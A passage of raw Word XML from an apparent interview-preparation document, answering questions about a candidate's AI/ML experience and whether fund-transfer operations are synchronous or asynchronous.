          <v:rect id="_x0000_i3625" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A637659" w14:textId="0966854B" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="000A2A1F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="898" w:name="_Toc196308378"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Do you have exposure in A</w:t>
      </w:r>
      <w:r w:rsidR="005B3196" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ML</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="898"/>
    </w:p>
    <w:p w14:paraId="5E5DE8F2" w14:textId="2F16F3F7" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00130093">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>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Yes, I have exposure to </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AI and Machine Learning</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> concepts and implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BE81ED" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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Here’s a quick overview of the areas I’m familiar with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8B3E28" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00000000" w:rsidP="00795EA8">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CFD9785">
          <v:rect id="_x0000_i3626" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDC754C" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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Core Areas in AI/ML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8CCC9B" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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upervised &amp; Unsupervised Learning</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>(Regression, Classification, Clustering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06925B03" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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Model Training &amp; Evaluation</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>(Train/Test Split, Cross-Validation, Accuracy, F1 Score)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BA2994" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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Feature Engineering</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>(Encoding, Normalization, Feature Selection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD9E209" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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Model Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>(Using Flask/FastAPI, Dockerize ML models, serve via REST API)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C17A36" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00000000" w:rsidP="00795EA8">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7AAA241">
          <v:rect id="_x0000_i3627" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="497A6F10" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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Tech Stack &amp; Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903A5FB" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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Languages</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0380FA" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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Libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: scikit-learn, pandas, NumPy, TensorFlow, Keras, PyTorch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D77B4C9" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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Model serving</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Flask, FastAPI, Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045F652E" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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Notebooks</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Jupyter for experimentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB9473D" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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Versioning</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Git, MLflow (for model tracking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EECB7A" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00000000" w:rsidP="00795EA8">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81F88C2">
          <v:rect id="_x0000_i3628" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3400B268" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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Sample Use Cases Worked On:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C90445" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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Text Classification</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (NLP) using TF-IDF + Logistic Regression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB57F4A" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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Image Classification</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using CNNs with TensorFlow/Keras</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E12AE1" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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redictive Analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for sales forecasting (Linear Regression, XGBoost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5936A9EA" w14:textId="77777777" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00795EA8">
      <w:pPr>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nomaly Detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Isolation Forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16851000" w14:textId="000A8A9C" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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3543AB2C">
          <v:rect id="_x0000_i3629" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BF5B47" w14:textId="2E5969F8" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="005F0528">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="899" w:name="_Toc196308379"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Examples of Fund Transfer are Synchronous or Asynchronous</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="899"/>
    </w:p>
    <w:p w14:paraId="210925A4" w14:textId="5D210A87" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C53" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Fund transfer</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations are typically handled using </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the core transaction process. Here's why:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F5BEDF" w14:textId="77777777" w:rsidR="00704C53"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C0CBCD2">
          <v:rect id="_x0000_i3630" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA856FD" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C53"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Synchronous Example (Most Common in Fund Transfer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711E09FD" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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User Action</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Initiates transfer from Bank A to Bank B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28722633" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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lastRenderedPageBreak/>
        <w:t>What Happens</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E302C99" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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PI call is made.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592BBAA7" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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ystem verifies account, balance, and destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA48709" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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Funds are debited immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDD5377" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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Response is returned to the user: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Transfer successful"</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Failed"</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D7C4FC" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C53" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reason</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It is </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>critical</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to confirm success or failure of the transaction </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immediately</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — hence, it must be </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ACDFB2" w14:textId="77777777" w:rsidR="00704C53"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B4967D">
          <v:rect id="_x0000_i3631" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="370E9BF0" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C53"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Asynchronous Scenarios in Fund Transfer (Supporting Tasks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46810BB9" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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While the actual transfer is synchronous, supporting tasks may be </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAB8143" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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Notification sending (email/SMS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518AC500" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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Ledger updates for analytics/reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B46CC9" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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udit logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBE486A" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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Fraud detection triggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DECEBD7" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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These can be offloaded to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Kafka, RabbitMQ) for </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65206F12" w14:textId="77777777" w:rsidR="00704C53"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DFDF6D9">
          <v:rect id="_x0000_i3632" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2851E8D2" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C53"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16"/>
        <w:gridCol w:w="1339"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="5ECCDA0B" w14:textId="77777777" w:rsidTr="00704C53">
